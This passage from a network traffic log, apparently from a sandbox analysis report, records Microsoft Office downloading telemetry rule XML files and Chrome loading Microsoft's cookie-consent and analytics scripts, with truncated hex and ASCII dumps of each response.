                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:53 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              92192.168.2.64981813.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:53 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:54 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:54 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 2592
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                              ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                              x-ms-request-id: 85babd8c-f01e-003f-4e8c-3ad19d000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073054Z-1777c6cb754b7tdghC1TEBwwa40000000atg00000000kenu
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:54 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              93192.168.2.64981913.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:54 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:54 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 3342
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                              ETag: "0x8DC582B927E47E9"
                                                                                                                                                                              x-ms-request-id: f77b0594-001e-0014-3c66-3b5151000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073054Z-178bfbc474bv7whqhC1NYC1fg4000000012g00000000eb2e
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:54 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              94192.168.2.64982213.107.246.454435636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:54 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                              Host: wcpstatic.microsoft.com
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                              Referer: https://learn.microsoft.com/
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                              2024-11-21 07:30:54 UTC712INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:54 GMT
                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                              Content-Length: 52717
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                              Age: 1520
                                                                                                                                                                              Cache-Control: max-age=43200
                                                                                                                                                                              Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                              Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                              Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                              x-ms-request-id: 09b6fa6f-101e-0038-42e3-3b8981000000
                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                              x-azure-ref: 20241121T073054Z-178bfbc474bfw4gbhC1NYCunf4000000018g0000000007qn
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:54 UTC15672INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                              Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                              2024-11-21 07:30:55 UTC16384INData Raw: 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69 65
                                                                                                                                                                              Data Ascii: {return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cookie
                                                                                                                                                                              2024-11-21 07:30:55 UTC712INData Raw: 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61
                                                                                                                                                                              Data Ascii: r"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + la
                                                                                                                                                                              2024-11-21 07:30:55 UTC16384INData Raw: 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d
                                                                                                                                                                              Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button-
                                                                                                                                                                              2024-11-21 07:30:55 UTC3565INData Raw: 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65
                                                                                                                                                                              Data Ascii: -")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChange


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              95192.168.2.64982313.107.246.454435636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:54 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                              Host: js.monitor.azure.com
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                              Referer: https://learn.microsoft.com/
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                              2024-11-21 07:30:54 UTC896INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:54 GMT
                                                                                                                                                                              Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                              Content-Length: 207935
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                              Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                              ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                              x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                              x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                              x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              x-azure-ref: 20241121T073054Z-178bfbc474bq2pr7hC1NYCkfgg00000001c00000000022n6
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache-Info: L2_T2
                                                                                                                                                                              X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:54 UTC15488INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                              Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                              2024-11-21 07:30:55 UTC16384INData Raw: 22 2b 74 5d 29 3f 6e 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26
                                                                                                                                                                              Data Ascii: "+t])?n(i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&
                                                                                                                                                                              2024-11-21 07:30:55 UTC16384INData Raw: 74 69 6f 6e 20 67 63 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75
                                                                                                                                                                              Data Ascii: tion gc(e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,fu
                                                                                                                                                                              2024-11-21 07:30:55 UTC16384INData Raw: 29 2c 68 28 29 2c 6d 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f
                                                                                                                                                                              Data Ascii: ),h(),m(e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reaso
                                                                                                                                                                              2024-11-21 07:30:55 UTC16384INData Raw: 28 7b 4e 6f 72 6d 61 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74
                                                                                                                                                                              Data Ascii: ({Normal:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}ret
